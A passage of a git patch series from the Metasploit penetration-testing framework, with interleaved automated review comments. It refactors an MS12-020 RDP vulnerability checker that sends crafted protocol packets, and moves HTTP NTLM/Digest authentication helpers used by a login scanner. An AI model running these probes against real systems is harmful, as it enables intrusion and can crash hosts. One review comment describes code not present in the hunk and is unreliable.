<bmccann[at]accuvant.com>' ], - 'License' => MSF_LICENSE, + 'License' => MSF_LICENSE )) register_options( 
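Review bot: The new Server-header check in run_host returns `:abort` without printing anything, so a host that fails the check is indistinguishable in the output from one that never answered. Add a verbose message before returning, for example `vprint_error("#{rhost}:#{rport} - Unexpected Server header, skipping")`. The rest of run_host lies outside the hunk.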
@@ -42,36 +42,18 @@ def initialize(info = {}) ], self.class) end - def checkRdp(packet) + def check_rdp # code to check if RDP is open or not - vprint_status("#{peer} - Verifying RDP Protocol") - begin - # send connection - sock.put(packet) - # read packet to see if its rdp - res = sock.recv(1024) - - if res.unpack("H*").join == "0300000b06d00000123400" - return true - else - return false - end - rescue - print_error("could not connect to RHOST") - return false - end - end + vprint_status("#{peer} Verifying RDP protocol...") + + # send connection + sock.put(connection_request) + + # read packet to see if its rdp + res = sock.get_once(-1, 5) - def connectionRequest() - packet = '' + - "\x03\x00" + # TPKT Header version 03, reserved 0 - "\x00\x0b" + # Length - "\x06" + # X.224 Data TPDU length - "\xe0" + # X.224 Type (Connection request) - "\x00\x00" + # dst reference - "\x00\x00" + # src reference - "\x00" # class and options - return packet + # return true if this matches our vulnerable response + ( res and res == "\x03\x00\x00\x0b\x06\xd0\x00\x00\x12\x34\x00" ) end def report_goods 
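Review bot: check_rdp no longer rescues anything around `sock.put` and `sock.get_once`, and the following hunk in run_host drops the `begin`/`rescue` around `connect` as well, so a refused or reset connection now raises out of run_host and skips `disconnect`. Unless the scanner mixin (not visible here) handles that per host, keep a `rescue ::Rex::ConnectionError` in run_host and move `disconnect` into an `ensure`. The new comment `# return true if this matches our vulnerable response` is also misleading: the comparison only recognises the RDP handshake reply, as the method's own header comment says, so something like `# true when the reply is the expected RDP connection confirm` is more accurate.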
@@ -79,120 +61,118 @@ def report_goods :host => rhost, :port => rport, :proto => 'tcp', - :name => 'The MS12-020 Checker', - :vuln => 'Confirmaiton that this host is vulnerable to MS12-020', - :refs => self.references, - :exploited_at => Time.now.utc + :name => self.name, + :info => 'Response indicates a missing patch', + :refs => self.references ) end - def connectInitial() - packet = '' + - "\x03\x00\x00\x65" + # TPKT Header - "\x02\xf0\x80" + # Data TPDU, EOT - "\x7f\x65\x5b" + # Connect-Initial - "\x04\x01\x01" + # callingDomainSelector - "\x04\x01\x01" + # callingDomainSelector - "\x01\x01\xff" + # upwardFlag - "\x30\x19" + # targetParams + size - "\x02\x01\x22" + # maxChannelIds - "\x02\x01\x20" + # maxUserIds - "\x02\x01\x00" + # maxTokenIds - "\x02\x01\x01" + # numPriorities - "\x02\x01\x00" + # minThroughput - "\x02\x01\x01" + # maxHeight - "\x02\x02\xff\xff" + # maxMCSPDUSize - "\x02\x01\x02" + # protocolVersion - "\x30\x18" + # minParams + size - "\x02\x01\x01" + # maxChannelIds - "\x02\x01\x01" + # maxUserIds - "\x02\x01\x01" + # maxTokenIds - "\x02\x01\x01" + # numPriorities - "\x02\x01\x00" + # minThroughput - "\x02\x01\x01" + # maxHeight - "\x02\x01\xff" + # maxMCSPDUSize - "\x02\x01\x02" + # protocolVersion - "\x30\x19" + # maxParams + size - "\x02\x01\xff" + # maxChannelIds - "\x02\x01\xff" + # maxUserIds - "\x02\x01\xff" + # maxTokenIds - "\x02\x01\x01" + # numPriorities - "\x02\x01\x00" + # minThroughput - "\x02\x01\x01" + # maxHeight - "\x02\x02\xff\xff" + # maxMCSPDUSize - "\x02\x01\x02" + # protocolVersion - "\x04\x00" # userData - return packet + def connection_request + "\x03\x00" + # TPKT Header version 03, reserved 0 + "\x00\x0b" + # Length + "\x06" + # X.224 Data TPDU length + "\xe0" + # X.224 Type (Connection request) + "\x00\x00" + # dst reference + "\x00\x00" + # src reference + "\x00" # class and options end - def userRequest() - packet = '' + - "\x03\x00" + # header - "\x00\x08" + # length - "\x02\xf0\x80" + # X.224 Data TPDU (2 
bytes: 0xf0 = Data TPDU, 0x80 = EOT, end of transmission) - "\x28" # PER encoded PDU contents - return packet + def connect_initial + "\x03\x00\x00\x65" + # TPKT Header + "\x02\xf0\x80" + # Data TPDU, EOT + "\x7f\x65\x5b" + # Connect-Initial + "\x04\x01\x01" + # callingDomainSelector + "\x04\x01\x01" + # callingDomainSelector + "\x01\x01\xff" + # upwardFlag + "\x30\x19" + # targetParams + size + "\x02\x01\x22" + # maxChannelIds + "\x02\x01\x20" + # maxUserIds + "\x02\x01\x00" + # maxTokenIds + "\x02\x01\x01" + # numPriorities + "\x02\x01\x00" + # minThroughput + "\x02\x01\x01" + # maxHeight + "\x02\x02\xff\xff" + # maxMCSPDUSize + "\x02\x01\x02" + # protocolVersion + "\x30\x18" + # minParams + size + "\x02\x01\x01" + # maxChannelIds + "\x02\x01\x01" + # maxUserIds + "\x02\x01\x01" + # maxTokenIds + "\x02\x01\x01" + # numPriorities + "\x02\x01\x00" + # minThroughput + "\x02\x01\x01" + # maxHeight + "\x02\x01\xff" + # maxMCSPDUSize + "\x02\x01\x02" + # protocolVersion + "\x30\x19" + # maxParams + size + "\x02\x01\xff" + # maxChannelIds + "\x02\x01\xff" + # maxUserIds + "\x02\x01\xff" + # maxTokenIds + "\x02\x01\x01" + # numPriorities + "\x02\x01\x00" + # minThroughput + "\x02\x01\x01" + # maxHeight + "\x02\x02\xff\xff" + # maxMCSPDUSize + "\x02\x01\x02" + # protocolVersion + "\x04\x00" # userData end - def channelRequestOne - packet = '' + - "\x03\x00\x00\x0c" + - "\x02\xf0\x80\x38" + - "\x00\x01\x03\xeb" - return packet + def user_request + "\x03\x00" + # header + "\x00\x08" + # length + "\x02\xf0\x80" + # X.224 Data TPDU (2 bytes: 0xf0 = Data TPDU, 0x80 = EOT, end of transmission) + "\x28" # PER encoded PDU contents end - def channelRequestTwo - packet = '' + - "\x03\x00\x00\x0c" + - "\x02\xf0\x80\x38" + - "\x00\x02\x03\xeb" - return packet + def channel_request_one + "\x03\x00\x00\x0c" + + "\x02\xf0\x80\x38" + + "\x00\x01\x03\xeb" + end + + def channel_request_two + "\x03\x00\x00\x0c" + + "\x02\xf0\x80\x38" + + "\x00\x02\x03\xeb" end def peer - return 
"#{rhost}:#{rport}" + "#{rhost}:#{rport}" end def run_host(ip) - begin - # open connection - connect() - rescue + + connect + + # check if rdp is open + if not check_rdp + disconnect return end - # check if rdp is open - if checkRdp(connectionRequest) - - # send connectInitial - sock.put(connectInitial) - # send userRequest - sock.put(userRequest) - user1_res = sock.recv(1024) - # send 2nd userRequest - sock.put(userRequest) - user2_res = sock.recv(1024) - # send channel request one - sock.put(channelRequestOne) - channel_one_res = sock.recv(1024) - if channel_one_res.unpack("H*").to_s[16..19] == '3e00' - # vulnerable - print_good("#{peer} - Vulnerable to MS12-020") - report_goods - - # send ChannelRequestTwo - prevent bsod - sock.put(channelRequestTwo) - - # report to the database - else - vprint_error("#{peer} - Not Vulnerable") - end + # send connectInitial + sock.put(connect_initial) + + # send userRequest + sock.put(user_request) + res = sock.get_once(-1, 5) + + # send 2nd userRequest + sock.put(user_request) + res = sock.get_once(-1, 5) + # send channel request one + sock.put(channel_request_one) + res = sock.get_once(-1, 5) + + if res and res[8,2] == "\x3e\x00" + # send ChannelRequestTwo - prevent BSoD + sock.put(channel_request_two) + + print_good("#{peer} Vulnerable to MS12-020") + report_goods + else + vprint_status("#{peer} Not Vulnerable") end - # close connection + disconnect() end end - From d5ae0053323c61a04220d3e6e28ab92150622df6 Mon Sep 17 00:00:00 2001 From: HD Moore <hd_moore@rapid7.com> Date: Fri, 1 Feb 2013 14:39:01 -0600 Subject: [PATCH 227/421] Rename with underscores --- .../scanner/rdp/{ms12-020_check.rb => ms12_020_check.rb} | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename modules/auxiliary/scanner/rdp/{ms12-020_check.rb => ms12_020_check.rb} (100%) 
diff --git a/modules/auxiliary/scanner/rdp/ms12-020_check.rb b/modules/auxiliary/scanner/rdp/ms12_020_check.rb similarity index 100% rename from modules/auxiliary/scanner/rdp/ms12-020_check.rb rename to modules/auxiliary/scanner/rdp/ms12_020_check.rb From a63cf6977c4ccd59b5441c4bfa5666a8a8b4b639 Mon Sep 17 00:00:00 2001 From: HD Moore <hd_moore@rapid7.com> Date: Fri, 1 Feb 2013 13:30:39 -0600 Subject: [PATCH 228/421] Fix 1.8 support --- modules/exploits/unix/webapp/zoneminder_packagecontrol_exec.rb | 3 +-- 1 file changed, 1 insertion(+), 2 deletions(-) diff --git a/modules/exploits/unix/webapp/zoneminder_packagecontrol_exec.rb b/modules/exploits/unix/webapp/zoneminder_packagecontrol_exec.rb index c405327ab0f6..ef6906721ed8 100644 --- a/modules/exploits/unix/webapp/zoneminder_packagecontrol_exec.rb +++ b/modules/exploits/unix/webapp/zoneminder_packagecontrol_exec.rb @@ -49,7 +49,7 @@ def initialize(info={}) ['Automatic Targeting', { 'auto' => true }] ], 'DefaultTarget' => 0, - 'DisclosureDate' => "Jan 22 2013", + 'DisclosureDate' => "Jan 22 2013" )) register_options([ @@ -145,4 +145,3 @@ def exploit end end - From 8e870f3654891a7a4dae5959dc41d5ed0c709b0f Mon Sep 17 00:00:00 2001 From: David Maloney <DMaloney@rapid7.com> Date: Wed, 30 Jan 2013 10:59:38 -0600 Subject: [PATCH 229/421] merge in sinn3r's changes --- lib/msf/core/exploit/http/client.rb | 259 +++++++++++++++++----------- 1 file changed, 161 insertions(+), 98 deletions(-) diff --git a/lib/msf/core/exploit/http/client.rb b/lib/msf/core/exploit/http/client.rb index 6d0bd9336b51..4608b38416a4 100644 --- a/lib/msf/core/exploit/http/client.rb +++ b/lib/msf/core/exploit/http/client.rb 
@@ -281,103 +281,6 @@ def basic_auth datastore['BasicAuthUser'] + ":" + (datastore['BasicAuthPass'] || '') end - # - # Connect to the server, and perform NTLM authentication for this session. - # Note the return value is [resp,c], so the caller can have access to both - # the last response, and the connection itself -- this is important since - # NTLM auth is bound to this particular TCP session. - # - # TODO: Fix up error messaging a lot more -- right now it's pretty hard - # to tell what all went wrong. - # - def send_http_auth_ntlm(opts={}, timeout = 20) - #ntlm_message_1 = "NTLM TlRMTVNTUAABAAAAB4IIAAAAAAAAAAAAAAAAAAAAAAA=" - ntlm_options = { - :signing => false, - :usentlm2_session => datastore['NTLM::UseNTLM2_session'], - :use_ntlmv2 => datastore['NTLM::UseNTLMv2'], - :send_lm => datastore['NTLM::SendLM'], - :send_ntlm => datastore['NTLM::SendNTLM'] - } - - ntlmssp_flags = NTLM_UTILS.make_ntlm_flags(ntlm_options) - workstation_name = Rex::Text.rand_text_alpha(rand(8)+1) - domain_name = datastore['DOMAIN'] - - ntlm_message_1 = "NTLM " + Rex::Text::encode_base64(NTLM_UTILS::make_ntlmssp_blob_init( domain_name, - workstation_name, - ntlmssp_flags)) - to = opts[:timeout] || timeout - begin - c = connect(opts) - - # First request to get the challenge - r = c.request_cgi(opts.merge({ - 'uri' => opts['uri'], - 'method' => 'GET', - 'headers' => { 'Authorization' => ntlm_message_1 }})) - resp = c.send_recv(r, to) - unless resp.kind_of? 
Rex::Proto::Http::Response - return [nil,nil] - end - return [nil,nil] if resp.code == 404 - return [nil,nil] unless resp.code == 401 && resp.headers['WWW-Authenticate'] - - # Get the challenge and craft the response - ntlm_challenge = resp.headers['WWW-Authenticate'].match(/NTLM ([A-Z0-9\x2b\x2f=]+)/i)[1] - return [nil,nil] unless ntlm_challenge - - - #old and simplier method but not compatible with windows 7/2008r2 - #ntlm_message_2 = Rex::Proto::NTLM::Message.decode64(ntlm_challenge) - #ntlm_message_3 = ntlm_message_2.response( {:user => opts['username'],:password => opts['password']}, {:ntlmv2 => true}) - - ntlm_message_2 = Rex::Text::decode_base64(ntlm_challenge) - blob_data = NTLM_UTILS.parse_ntlm_type_2_blob(ntlm_message_2) - - challenge_key = blob_data[:challenge_key] - server_ntlmssp_flags = blob_data[:server_ntlmssp_flags] #else should raise an error - #netbios name - default_name = blob_data[:default_name] || '' - #netbios domain - default_domain = blob_data[:default_domain] || '' - #dns name - dns_host_name = blob_data[:dns_host_name] || '' - #dns domain - dns_domain_name = blob_data[:dns_domain_name] || '' - #Client time - chall_MsvAvTimestamp = blob_data[:chall_MsvAvTimestamp] || '' - - spnopt = {:use_spn => datastore['NTLM::SendSPN'], :name => self.rhost} - - resp_lm, - resp_ntlm, - client_challenge, - ntlm_cli_challenge = NTLM_UTILS.create_lm_ntlm_responses(opts['username'], opts['password'], challenge_key, - domain_name, default_name, default_domain, - dns_host_name, dns_domain_name, chall_MsvAvTimestamp, - spnopt, ntlm_options) - - ntlm_message_3 = NTLM_UTILS.make_ntlmssp_blob_auth(domain_name, workstation_name, opts['username'], - resp_lm, resp_ntlm, '', ntlmssp_flags) - ntlm_message_3 = Rex::Text::encode_base64(ntlm_message_3) - - # Send the response - r = c.request_cgi(opts.merge({ - 'uri' => opts['uri'], - 'method' => 'GET', - 'headers' => { 'Authorization' => "NTLM #{ntlm_message_3}"}})) - resp = c.send_recv(r, to, true) - unless 
resp.kind_of? Rex::Proto::Http::Response - return [nil,nil] - end - return [nil,nil] if resp.code == 404 - return [resp,c] - - rescue ::Errno::EPIPE, ::Timeout::Error - end - end - def send_digest_request_cgi(opts={}, timeout=20) @nonce_count = 0 
@@ -514,6 +417,166 @@ def send_digest_request_cgi(opts={}, timeout=20) end end + + # + # Authenticates to the remote host based on the most appropriate authentication method, + # and returns the HTTP response. If there are multiple auth methods supported, then it + # will pick one in the following order: Basic, Digest, Negotiate, and then NTLM. + # + # Options: + # - username: The username to authenticate as + # - password: The password to authenticate with + # + def send_request_smart_auth(opts={}, timeout=20) + res = send_request_cgi(opts,timeout) + return nil if res.nil? + return res unless res.code == 401 + return res if opts['username'].blank? + return res unless res.headers['WWW-Authenticate'] + + if res.headers['WWW-Authenticate'].include? "Basic" + opts['basic_auth'] = opts['username'] + ":" + opts['password'] + res = send_request_cgi(opts,timeout) + return res + + elsif res.headers['WWW-Authenticate'].include? "Digest" + opts['DigestAuthUser'] = opts['username'] + opts['DigestAuthPassword'] = opts['password'] + res, c = send_digest_request_cgi(opts,timeout) + return res + + elsif res.headers['WWW-Authenticate'].include? "Negotiate" + opts['provider'] = 'Negotiate' + res = send_request_auth_negotiate(opts,timeout) + return res + + elsif res.headers['WWW-Authenticate'].include? "NTLM" + opts['provider'] = 'NTLM' + res = send_request_auth_negotiate(opts,timeout) + return res + + end + + return nil + end + + + # + # Handles both generic Negotiate and NTLM providers + # This does not send back the client, instead it expects that you will + # handshake for each request sent. While this does create additional + # overhead on the wire, it makes dealing with the requests much easier + # from a code point of view. 
+ # + # Options: + # - method: HTTP method, default: GET + # - headers: HTTP headers as a hash + # - provider: HTTP authentication provider, default: 'NTLM ' + # - username: The username to authenticate as + # - password: The password to authenticate with + # + def send_request_auth_negotiate(opts ={}, timeout =20) + ntlm_options = { + :signing => false, + :usentlm2_session => datastore['NTLM::UseNTLM2_session'], + :use_ntlmv2 => datastore['NTLM::UseNTLMv2'], + :send_lm => datastore['NTLM::SendLM'], + :send_ntlm => datastore['NTLM::SendNTLM'] + } + + if opts['provider'] and opts['provider'].include? 'Negotiate' + provider = "Negotiate " + else + provider = 'NTLM ' + end + + opts['method']||= 'GET' + opts['headers']||= {} + + ntlmssp_flags = NTLM_UTILS.make_ntlm_flags(ntlm_options) + workstation_name = Rex::Text.rand_text_alpha(rand(8)+1) + domain_name = datastore['DOMAIN'] + + b64_blob = Rex::Text::encode_base64( + NTLM_UTILS::make_ntlmssp_blob_init( + domain_name, + workstation_name, + ntlmssp_flags + )) + + ntlm_message_1 = provider + b64_blob + to = opts['timeout'] || timeout + + begin + c = connect(opts) + + # First request to get the challenge + opts['headers']['Authorization'] = ntlm_message_1 + r = c.request_cgi(opts) + resp = c.send_recv(r, to) + unless resp.kind_of? 
Rex::Proto::Http::Response + return nil + end + + return resp unless resp.code == 401 && resp.headers['WWW-Authenticate'] + + # Get the challenge and craft the response + ntlm_challenge = resp.headers['WWW-Authenticate'].scan(/#{provider}([A-Z0-9\x2b\x2f=]+)/i).flatten[0] + return resp unless ntlm_challenge + + ntlm_message_2 = Rex::Text::decode_base64(ntlm_challenge) + blob_data = NTLM_UTILS.parse_ntlm_type_2_blob(ntlm_message_2) + + challenge_key = blob_data[:challenge_key] + server_ntlmssp_flags = blob_data[:server_ntlmssp_flags] #else should raise an error + default_name = blob_data[:default_name] || '' #netbios name + default_domain = blob_data[:default_domain] || '' #netbios domain + dns_host_name = blob_data[:dns_host_name] || '' #dns name + dns_domain_name = blob_data[:dns_domain_name] || '' #dns domain + chall_MsvAvTimestamp = blob_data[:chall_MsvAvTimestamp] || '' #Client time + + spnopt = {:use_spn => datastore['NTLM::SendSPN'], :name => self.rhost} + + resp_lm, resp_ntlm, client_challenge, ntlm_cli_challenge = NTLM_UTILS.create_lm_ntlm_responses( + opts['username'], + opts['password'], + challenge_key, + domain_name, + default_name, + default_domain, + dns_host_name, + dns_domain_name, + chall_MsvAvTimestamp, + spnopt, + ntlm_options + ) + + ntlm_message_3 = NTLM_UTILS.make_ntlmssp_blob_auth( + domain_name, + workstation_name, + opts['username'], + resp_lm, + resp_ntlm, + '', + ntlmssp_flags + ) + + ntlm_message_3 = Rex::Text::encode_base64(ntlm_message_3) + + # Send the response + opts['headers']['Authorization'] = "#{provider}#{ntlm_message_3}" + r = c.request_cgi(opts) + resp = c.send_recv(r, to, true) + unless resp.kind_of? Rex::Proto::Http::Response + return nil + end + return resp + + rescue ::Errno::EPIPE, ::Timeout::Error + return nil + end + end + ## # # Wrappers for getters @@ -722,4 +785,4 @@ def make_cnonce end -end +end \ No newline at end of file From 5814c5962083a63567cc7cf094f2c58d73954662 Mon Sep 17 00:00:00 2001 
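Review bot: send_request_smart_auth tries the offered schemes weakest-first: when a server advertises Basic alongside Digest, Negotiate or NTLM, the `include? "Basic"` branch wins and the password goes out base64-encoded on the retried request, so over plain HTTP it is readable on the path, and any server or intermediary can select Basic simply by listing it. Reverse the branch order so Basic is the last resort and update the doc comment's "Basic, Digest, Negotiate, and then NTLM" to match, or make the preference an option. In the Basic branch, `opts['username'] + ":" + opts['password']` raises TypeError when no password is supplied; `opts['password'].to_s` avoids that. Both new methods also write `basic_auth`, `provider`, `method` and `headers['Authorization']` into the caller's `opts` hash, so working on a copy would keep credentials out of later requests that reuse the hash.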
From: David Maloney <DMaloney@rapid7.com> Date: Wed, 30 Jan 2013 12:42:46 -0600 Subject: [PATCH 230/421] move httpauth to mixin HttpAuth stuff gets it's own little mixin mix it in to Exploit::Http::Client mix in it to Auxiliary::Web::HTTP --- lib/msf/core/auxiliary/web/http.rb | 19 ++ lib/msf/core/exploit/http/client.rb | 265 +------------------ lib/msf/core/exploit/mixins.rb | 2 + modules/auxiliary/scanner/http/http_login.rb | 11 +- 4 files changed, 29 insertions(+), 268 deletions(-) diff --git a/lib/msf/core/auxiliary/web/http.rb b/lib/msf/core/auxiliary/web/http.rb index 0a59187c02f2..ffb0385d36f0 100644 --- a/lib/msf/core/auxiliary/web/http.rb +++ b/lib/msf/core/auxiliary/web/http.rb @@ -10,6 +10,8 @@ module Msf class Auxiliary::Web::HTTP + include Exploit::Remote::HttpAuth + class Request attr_accessor :url attr_reader :opts @@ -147,6 +149,23 @@ def request( url, opts = {} ) while rlimit >= 0 rlimit -= 1 res = _request( url, opts ) + if res.code == 401 and res.headers['WWW-Authenticate'] and opts['username'] + if res.headers['WWW-Authenticate'].include? 'Basic' + opts['password']||= '' + opts['basic_auth'] = opts['username'] + ":" + opts['password'] + res = _request( url, opts ) + elsif res.headers['WWW-Authenticate'].include? 'Digest' + opts['DigestAuthUser'] = opts['username'] + opts['DigestAuthPassword'] = opts['password'] + res = send_digest_request_cgi(opts,timeout) + elsif res.headers['WWW-Authenticate'].include? "Negotiate" + opts['provider'] = 'Negotiate' + res = send_request_auth_negotiate(opts,timeout) + elsif res.headers['WWW-Authenticate'].include? "NTLM" + opts['provider'] = 'NTLM' + res = send_request_auth_negotiate(opts,timeout) + end + end return res if !opts[:follow_redirect] || !url = res.headers['location'] end nil diff --git a/lib/msf/core/exploit/http/client.rb b/lib/msf/core/exploit/http/client.rb index 4608b38416a4..b5df69ba248c 100644 --- a/lib/msf/core/exploit/http/client.rb +++ b/lib/msf/core/exploit/http/client.rb 
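Review bot: The added 401 handling in `request` passes `timeout` to send_digest_request_cgi and send_request_auth_negotiate, but `timeout` is not a parameter of `request( url, opts = {} )` and no local of that name is set in the hunk; unless the class defines a `timeout` reader outside the visible lines, these branches raise NameError the first time a server asks for Digest, Negotiate or NTLM. The helpers, as they stood in client.rb, also rely on `datastore` and `connect(opts)` and take the target from `opts['uri']` rather than from `url`, so it is worth confirming that Auxiliary::Web::HTTP provides all of those. The new code reads `opts['username']` with a string key while the same method uses `opts[:follow_redirect]`; one key style should be used throughout so callers are not silently skipped.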
@@ -16,6 +16,7 @@ module Msf module Exploit::Remote::HttpClient include Msf::Auxiliary::Report include Exploit::Remote::NTLM::Client + include Exploit::Remote::HttpAuth # # Constants 
@@ -273,151 +274,6 @@ def send_request_cgi(opts={}, timeout = 20) end end - # - # Combine the user/pass into an auth string for the HTTP Client - # - def basic_auth - return if not datastore['BasicAuthUser'] - datastore['BasicAuthUser'] + ":" + (datastore['BasicAuthPass'] || '') - end - - def send_digest_request_cgi(opts={}, timeout=20) - @nonce_count = 0 - - return [nil,nil] if not (datastore['DigestAuthUser'] or opts['DigestAuthUser']) - to = opts['timeout'] || timeout - - digest_user = datastore['DigestAuthUser'] || opts['DigestAuthUser'] || "" - digest_password = datastore['DigestAuthPassword'] || opts['DigestAuthPassword'] || "" - - method = opts['method'] - path = opts['uri'] - iis = true - if (opts['DigestAuthIIS'] == false or datastore['DigestAuthIIS'] == false) - iis = false - end - - begin - @nonce_count += 1 - - resp = opts['response'] - - if not resp - # Get authentication-challenge from server, and read out parameters required - c = connect(opts) - r = c.request_cgi(opts.merge({ - 'uri' => path, - 'method' => method })) - resp = c.send_recv(r, to) - unless resp.kind_of? Rex::Proto::Http::Response - return [nil,nil] - end - return [nil,nil] if resp.code == 404 - if resp.code != 401 - return resp - end - return [nil,nil] unless resp.headers['WWW-Authenticate'] - end - - # Don't anchor this regex to the beginning of string because header - # folding makes it appear later when the server presents multiple - # WWW-Authentication options (such as is the case with IIS configured - # for Digest or NTLM). 
- resp['www-authenticate'] =~ /Digest (.*)/ - - parameters = {} - $1.split(/,[[:space:]]*/).each do |p| - k, v = p.split("=", 2) - parameters[k] = v.gsub('"', '') - end - - qop = parameters['qop'] - - if parameters['algorithm'] =~ /(.*?)(-sess)?$/ - algorithm = case $1 - when 'MD5' then Digest::MD5 - when 'SHA1' then Digest::SHA1 - when 'SHA2' then Digest::SHA2 - when 'SHA256' then Digest::SHA256 - when 'SHA384' then Digest::SHA384 - when 'SHA512' then Digest::SHA512 - when 'RMD160' then Digest::RMD160 - else raise Error, "unknown algorithm \"#{$1}\"" - end - algstr = parameters["algorithm"] - sess = $2 - else - algorithm = Digest::MD5 - algstr = "MD5" - sess = false - end - - a1 = if sess then - [ - algorithm.hexdigest("#{digest_user}:#{parameters['realm']}:#{digest_password}"), - parameters['nonce'], - @cnonce - ].join ':' - else - "#{digest_user}:#{parameters['realm']}:#{digest_password}" - end - - ha1 = algorithm.hexdigest(a1) - ha2 = algorithm.hexdigest("#{method}:#{path}") - - request_digest = [ha1, parameters['nonce']] - request_digest.push(('%08x' % @nonce_count), @cnonce, qop) if qop - request_digest << ha2 - request_digest = request_digest.join ':' - - # Same order as IE7 - auth = [ - "Digest username=\"#{digest_user}\"", - "realm=\"#{parameters['realm']}\"", - "nonce=\"#{parameters['nonce']}\"", - "uri=\"#{path}\"", - "cnonce=\"#{@cnonce}\"", - "nc=#{'%08x' % @nonce_count}", - "algorithm=#{algstr}", - "response=\"#{algorithm.hexdigest(request_digest)[0, 32]}\"", - # The spec says the qop value shouldn't be enclosed in quotes, but - # some versions of IIS require it and Apache accepts it. Chrome - # and Firefox both send it without quotes but IE does it this way. - # Use the non-compliant-but-everybody-does-it to be as compatible - # as possible by default. The user can override if they don't like - # it. - if qop.nil? then - elsif iis then - "qop=\"#{qop}\"" - else - "qop=#{qop}" - end, - if parameters.key? 
'opaque' then - "opaque=\"#{parameters['opaque']}\"" - end - ].compact - - headers ={ 'Authorization' => auth.join(', ') } - headers.merge!(opts['headers']) if opts['headers'] - - - # Send main request with authentication - r = c.request_cgi(opts.merge({ - 'uri' => path, - 'method' => method, - 'headers' => headers })) - resp = c.send_recv(r, to) - unless resp.kind_of? Rex::Proto::Http::Response - return [nil,nil] - end - - return [resp,c] - - rescue ::Errno::EPIPE, ::Timeout::Error - end - end - - # # Authenticates to the remote host based on the most appropriate authentication method, # and returns the HTTP response. If there are multiple auth methods supported, then it @@ -435,6 +291,7 @@ def send_request_smart_auth(opts={}, timeout=20) return res unless res.headers['WWW-Authenticate'] if res.headers['WWW-Authenticate'].include? "Basic" + opts['password']||= '' opts['basic_auth'] = opts['username'] + ":" + opts['password'] res = send_request_cgi(opts,timeout) return res @@ -442,7 +299,7 @@ def send_request_smart_auth(opts={}, timeout=20) elsif res.headers['WWW-Authenticate'].include? "Digest" opts['DigestAuthUser'] = opts['username'] opts['DigestAuthPassword'] = opts['password'] - res, c = send_digest_request_cgi(opts,timeout) + res = send_digest_request_cgi(opts,timeout) return res elsif res.headers['WWW-Authenticate'].include? "Negotiate" 
@@ -461,122 +318,6 @@ def send_request_smart_auth(opts={}, timeout=20) end - # - # Handles both generic Negotiate and NTLM providers - # This does not send back the client, instead it expects that you will - # handshake for each request sent. While this does create additional - # overhead on the wire, it makes dealing with the requests much easier - # from a code point of view. - # - # Options: - # - method: HTTP method, default: GET - # - headers: HTTP headers as a hash - # - provider: HTTP authentication provider, default: 'NTLM ' - # - username: The username to authenticate as - # - password: The password to authenticate with - # - def send_request_auth_negotiate(opts ={}, timeout =20) - ntlm_options = { - :signing => false, - :usentlm2_session => datastore['NTLM::UseNTLM2_session'], - :use_ntlmv2 => datastore['NTLM::UseNTLMv2'], - :send_lm => datastore['NTLM::SendLM'], - :send_ntlm => datastore['NTLM::SendNTLM'] - } - - if opts['provider'] and opts['provider'].include? 'Negotiate' - provider = "Negotiate " - else - provider = 'NTLM ' - end - - opts['method']||= 'GET' - opts['headers']||= {} - - ntlmssp_flags = NTLM_UTILS.make_ntlm_flags(ntlm_options) - workstation_name = Rex::Text.rand_text_alpha(rand(8)+1) - domain_name = datastore['DOMAIN'] - - b64_blob = Rex::Text::encode_base64( - NTLM_UTILS::make_ntlmssp_blob_init( - domain_name, - workstation_name, - ntlmssp_flags - )) - - ntlm_message_1 = provider + b64_blob - to = opts['timeout'] || timeout - - begin - c = connect(opts) - - # First request to get the challenge - opts['headers']['Authorization'] = ntlm_message_1 - r = c.request_cgi(opts) - resp = c.send_recv(r, to) - unless resp.kind_of? 
Rex::Proto::Http::Response - return nil - end - - return resp unless resp.code == 401 && resp.headers['WWW-Authenticate'] - - # Get the challenge and craft the response - ntlm_challenge = resp.headers['WWW-Authenticate'].scan(/#{provider}([A-Z0-9\x2b\x2f=]+)/i).flatten[0] - return resp unless ntlm_challenge - - ntlm_message_2 = Rex::Text::decode_base64(ntlm_challenge) - blob_data = NTLM_UTILS.parse_ntlm_type_2_blob(ntlm_message_2) - - challenge_key = blob_data[:challenge_key] - server_ntlmssp_flags = blob_data[:server_ntlmssp_flags] #else should raise an error - default_name = blob_data[:default_name] || '' #netbios name - default_domain = blob_data[:default_domain] || '' #netbios domain - dns_host_name = blob_data[:dns_host_name] || '' #dns name - dns_domain_name = blob_data[:dns_domain_name] || '' #dns domain - chall_MsvAvTimestamp = blob_data[:chall_MsvAvTimestamp] || '' #Client time - - spnopt = {:use_spn => datastore['NTLM::SendSPN'], :name => self.rhost} - - resp_lm, resp_ntlm, client_challenge, ntlm_cli_challenge = NTLM_UTILS.create_lm_ntlm_responses( - opts['username'], - opts['password'], - challenge_key, - domain_name, - default_name, - default_domain, - dns_host_name, - dns_domain_name, - chall_MsvAvTimestamp, - spnopt, - ntlm_options - ) - - ntlm_message_3 = NTLM_UTILS.make_ntlmssp_blob_auth( - domain_name, - workstation_name, - opts['username'], - resp_lm, - resp_ntlm, - '', - ntlmssp_flags - ) - - ntlm_message_3 = Rex::Text::encode_base64(ntlm_message_3) - - # Send the response - opts['headers']['Authorization'] = "#{provider}#{ntlm_message_3}" - r = c.request_cgi(opts) - resp = c.send_recv(r, to, true) - unless resp.kind_of? Rex::Proto::Http::Response - return nil - end - return resp - - rescue ::Errno::EPIPE, ::Timeout::Error - return nil - end - end - ## # # Wrappers for getters diff --git a/lib/msf/core/exploit/mixins.rb b/lib/msf/core/exploit/mixins.rb index 0e10f7a5a26c..6e45892469bf 100644 --- a/lib/msf/core/exploit/mixins.rb 
+++ b/lib/msf/core/exploit/mixins.rb @@ -37,6 +37,7 @@ require 'msf/core/exploit/tftp' require 'msf/core/exploit/telnet' require 'msf/core/exploit/ftpserver' +require 'msf/core/exploit/http/auth' require 'msf/core/exploit/http/client' require 'msf/core/exploit/http/server' require 'msf/core/exploit/smtp' @@ -94,3 +95,4 @@ # WebApp require 'msf/core/exploit/web' + diff --git a/modules/auxiliary/scanner/http/http_login.rb b/modules/auxiliary/scanner/http/http_login.rb index 5a6b0ab9a617..570ed26c28a4 100644 --- a/modules/auxiliary/scanner/http/http_login.rb +++ b/modules/auxiliary/scanner/http/http_login.rb @@ -204,12 +204,11 @@ def do_http_login(user,pass,scheme) def do_http_auth_ntlm(user,pass) begin - resp,c = send_http_auth_ntlm( + resp = send_request_auth_negotiate( 'uri' => @uri, 'username' => user, 'password' => pass ) - c.close return :abort if (resp.code == 404) if [200, 301, 302].include?(resp.code) @@ -262,7 +261,7 @@ def do_http_auth_digest(user,pass,requesttype) path = 